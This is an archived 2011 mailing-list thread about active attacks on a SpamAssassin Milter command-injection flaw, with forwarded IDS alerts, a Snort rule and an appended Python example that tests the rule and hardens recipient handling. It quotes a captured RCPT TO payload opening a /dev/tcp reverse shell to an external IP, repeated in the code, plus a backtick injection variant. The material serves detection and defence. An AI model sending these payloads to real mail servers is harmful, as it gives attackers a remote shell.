spamass-milt-list


From: Adam Katz
Subject: Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Date: Thu, 10 Feb 2011 12:37:59 -0800
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101213 Lightning/1.0b2 Icedove/3.1.7

I'm subscribed under a different address between these lists, so my
cross-post to this list failed.  Post attached.
--- Begin Message ---
Subject: Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Date: Thu, 10 Feb 2011 12:14:59 -0800
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101213 Lightning/1.0b2 Icedove/3.1.7

Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
>> in case you are using spamassassin milter:
>> 
>> active exploits going on.
>> 
>> <http://seclists.org/fulldisclosure/2010/Mar/140>
>> <http://www.securityfocus.com/bid/38578>
>> 
>> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>> 
>> I don't see anything on bugtraq about a fix.

On 02/10/2011 10:21 AM, David F. Skoll wrote:
> Aieee.... popen() in security-sensitive software!??!??
> 
> Also, why does the milter process run as root?  That seems like a huge
> hole all by itself.


Does this affect sendmail as well as postfix?  I assume so, but wanted
an explicit confirmation.  (I am no longer managing an environment that
uses this milter and therefore cannot verify myself.)
--- Begin Message ---
Subject: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Date: Thu, 10 Feb 2011 12:42:40 -0500
User-agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101207 Thunderbird/3.1.7

heads up:

in case you are using spamassassin milter:

active exploits going on.

<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
Personally, I would probably block it.  Although, if we're not seeing this sort of thing pop up on customers' boxes, a manual block in scanner2 is sufficient for now, right?
Either way, let me know and I’ll block/unblock/leave alone.
--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264
From: Michael Scheidell
Sent: Thursday, February 10, 2011 12:25 PM
To: John Meyer
Cc: Jonathan Scheidell; Anthony Wetula
Subject: Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
is the snort rule specific enough that you can block the offending ip for 5 mins?

(if it's a real SMTP server, it will retry) and let legit email through.
On 2/10/11 12:12 PM, John Meyer wrote:

I don’t like the looks of this.  I blocked that IP with samtool.
Payload:
rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"

data

.

quit
From: SECNAP Network Security
Sent: Thursday, February 10, 2011 12:01 PM
To: address@hidden
Subject: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
[Classification: Attempted User Privilege Gain] [Priority: 1]
--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
> | SECNAP Network Security Corporation

- Certified SNORT Integrator
- 2008-9 Hot Company Award Winner, World Executive Alliance
- Five-Star Partner Program 2009, VARBusiness
- Best in Email Security, 2010: Network Products Guide
- King of Spam Filters, SC Magazine 2008

This email has been scanned and certified safe by SpammerTrap®.
For Information please see http://www.secnap.com/products/spammertrap/

--- End Message ---
--- End Message ---
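The following is an added example; it is not code from this thread, from SECNAP, or from the spamass-milter project. It replays the two content matches of the Emerging Threats rule John Meyer quoted (content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";) against a constructed SMTP transcript that includes the RCPT TO payload from the alert. That also answers Michael Scheidell's question about how specific the rule is: it fires only on the literal bytes +:"| after a "to:" in the first ten bytes, so ordinary plus-addressing never matches, but a constructed variant using a different metacharacter does not match either. The stricter suspicious_recipient check and the expansion_argv helper are hypothetical hardening for the popen() call David Skoll objects to; the command name handed to expansion_argv is an assumption, not spamass-milter's actual helper.

```python
"""Added example, not code from the thread or from spamass-milter.

Replays the Emerging Threats content matches quoted in the thread against a
constructed SMTP transcript, and shows a stricter recipient check that a
milter could apply before an address reaches anything that invokes a shell.
"""
import re
from typing import List, Optional, Tuple

# Rule body quoted in the thread:
#   content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
# First content: "to:" case-insensitively within the first 10 payload bytes.
# Second content: the literal bytes  +:"|  anywhere in the payload.
ET_FIRST = b"to:"
ET_SECOND = b'+:"|'
ET_DEPTH = 10


def matches_et_rule(payload: bytes) -> bool:
    """True when both content matches of the quoted rule hit the payload."""
    if payload[:ET_DEPTH].lower().find(ET_FIRST) < 0:
        return False
    return ET_SECOND in payload


RCPT_RE = re.compile(rb"^rcpt\s+to:\s*(.*?)\s*$", re.IGNORECASE)

# Bytes that should never reach a command line built from a recipient:
# shell pipes, separators, command substitution, redirection, quoting, newlines.
SHELL_META = re.compile(r"[|;&`$<>()\"'\\\r\n]")


def rcpt_address(line: bytes) -> Optional[str]:
    """Return the address from an SMTP RCPT TO command, or None for other commands."""
    m = RCPT_RE.match(line.strip())
    if not m:
        return None
    addr = m.group(1)
    if addr.startswith(b"<") and addr.endswith(b">"):
        addr = addr[1:-1]
    return addr.decode("latin-1")


def suspicious_recipient(addr: str) -> bool:
    """Stricter than the ET rule: any shell metacharacter in the local part.

    Plain plus-addressing such as user+tag@example.com passes; anything that
    could break out of a quoted command string does not.
    """
    local_part = addr.rsplit("@", 1)[0]
    return SHELL_META.search(local_part) is not None


def expansion_argv(addr: str, command: List[str]) -> List[str]:
    """Hypothetical hardening for the popen() criticised in the thread.

    Validate first, then hand the address over as one argv element (to be run
    with subprocess.run(argv) and no shell) so /bin/sh never re-parses it.
    The command itself is an assumption, not spamass-milter's actual helper.
    """
    if suspicious_recipient(addr):
        raise ValueError(f"refusing recipient with shell metacharacters: {addr!r}")
    return command + [addr]


def scan_session(lines: List[bytes]) -> List[Tuple[int, str, bool, bool]]:
    """Return (line number, address, ET rule hit, strict check hit) per RCPT line."""
    findings = []
    for number, line in enumerate(lines, 1):
        addr = rcpt_address(line)
        if addr is None:
            continue
        findings.append((number, addr, matches_et_rule(line), suspicious_recipient(addr)))
    return findings


# Constructed transcript: benign plus-addressing, the payload from the alert,
# and a variant with a different metacharacter that the ET content match does
# not cover (included only to illustrate how narrow the rule is).
SESSION = [
    b"EHLO mail.example.org",
    b"MAIL FROM:<alice@example.org>",
    b"RCPT TO:<bob+newsletter@example.com>",
    b'rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"',
    b"RCPT TO:<root+:`id`@example.com>",
    b"DATA",
]

if __name__ == "__main__":
    for number, addr, et_hit, strict_hit in scan_session(SESSION):
        print(f"line {number}: ET={et_hit!s:5} strict={strict_hit!s:5} {addr}")
```

Run as a script it lists the three RCPT lines: the benign one clears both checks, the payload from the alert trips both, and the backtick variant trips only the stricter local-part check. For the 5-minute block Michael asks about, that narrowness is the trade-off: the ET signature is precise enough that blocking on it will not touch a legitimate MTA, but it is also easy to sidestep, which is why the milter-side validation, not the signature, is the real fix.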
